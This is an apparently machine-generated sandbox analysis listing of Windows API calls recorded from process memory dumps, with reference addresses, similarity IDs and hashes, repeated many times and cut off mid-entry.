                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0067BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 029B0502
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 029B0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0067A94A
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 029B0640
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0067ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 029B1148
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 029B099C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185285266.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0067A39C
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0067AA71
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0067A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0067A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177731906.000000000067A000.00000040.00000001.sdmp, Offset: 0067A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2186105623.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185768103.0000000002AC0000.00000040.00000040.sdmp, Offset: 02AC0000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185768103.0000000002AC0000.00000040.00000040.sdmp, Offset: 02AC0000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2186105623.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177703671.0000000000672000.00000040.00000001.sdmp, Offset: 00672000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177703671.0000000000672000.00000040.00000001.sdmp, Offset: 00672000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0043AD37
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0043AD37
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0043B329
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0043B329
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01FC01D0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01FC072D
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01FC0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01FC109E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0043A23E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC0819
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01FC0502
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01FC072D
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC08E5
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0043A94A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01FC0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01FC0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0043AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01FC1148
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0043BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC08E5
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0043A39C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01FC132F
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01FC0640
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0043AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0043AA71
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01FC099C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC0819
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0043ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0043BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0043A23E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01FC109E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01FC01D0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01FC132F
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0043A94A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01FC0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01FC0502
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 01FC0640
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 0043ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01FC1148
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 0043A39C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 01FC099C
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 0043AA71
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0043A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0043A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%


                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DEAD37
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 1b3131f482e773b7e9f7b1a8ce34d29aed548ae8a48400b2027949c49d353561
                                                    • Instruction ID: bc80a28a63ccca0d8cb0d30e4a17a376acc53da528e8b3d1d3127edaab09646b
                                                    • Opcode Fuzzy Hash: 1b3131f482e773b7e9f7b1a8ce34d29aed548ae8a48400b2027949c49d353561
                                                    • Instruction Fuzzy Hash: 4C21D1765097849FEB238F29DC44B92BFF4EF06311F0984DAE9848B163D2719918DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DEAD37
                                                    Memory Dump Source
